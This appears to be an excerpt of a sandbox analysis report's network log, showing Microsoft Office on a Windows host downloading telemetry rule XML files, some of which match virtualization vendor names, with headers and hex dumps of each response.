                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              58192.168.2.64976913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:35 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:35 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                              x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123935Z-174c587ffdf8fcgwhC1TEBnn7000000004qg00000000004k
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              59192.168.2.64977113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:35 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:35 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                              ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                              x-ms-request-id: b6ecb1ee-501e-008f-3044-3c9054000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123935Z-15b8b599d889fz52hC1TEB59as00000004d0000000009shm
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:35 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              60192.168.2.64977213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:35 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:35 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                              x-ms-request-id: 3579edf6-b01e-0070-6931-3e1cc0000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123935Z-15b8b599d88vp97chC1TEB5pzw00000004f0000000004w5s
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:35 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              61192.168.2.64977013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:35 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:35 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                              x-ms-request-id: 2b57feed-101e-0028-5221-3c8f64000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123935Z-178bfbc474bv7whqhC1NYC1fg400000005x0000000009nxf
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              62192.168.2.64977713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:37 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:38 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                              x-ms-request-id: 6b17e566-f01e-003f-7a44-3cd19d000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123938Z-178bfbc474bfw4gbhC1NYCunf40000000620000000001qy9
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:38 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              63192.168.2.64977313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:37 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:37 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                              x-ms-request-id: 6b91e280-c01e-00a2-4f0a-3d2327000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123937Z-178bfbc474bq2pr7hC1NYCkfgg000000065g000000003pdy
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              64192.168.2.64977413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:37 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:37 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                              x-ms-request-id: 43acaf28-701e-006f-5cf7-3cafc4000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123937Z-178bfbc474bpscmfhC1NYCfc2c00000004f000000000bqvp
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:38 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              65192.168.2.64977513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:37 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:38 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                              x-ms-request-id: 1e280d2f-401e-0029-0d7f-3b9b43000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123938Z-174c587ffdfp4vpjhC1TEBybqw00000004bg00000000g1ub
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              66192.168.2.64977613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:37 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:38 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                              x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123938Z-178bfbc474bp8mkvhC1NYCzqnn00000005wg000000002fa9
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:38 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              67192.168.2.64977820.198.119.143443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:39 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 7a 67 71 79 43 65 38 4e 4d 30 61 6e 6d 6b 6f 65 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 62 37 38 37 64 39 35 33 30 64 66 63 37 63 62 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: zgqyCe8NM0anmkoe.1Context: 6b787d9530dfc7cb
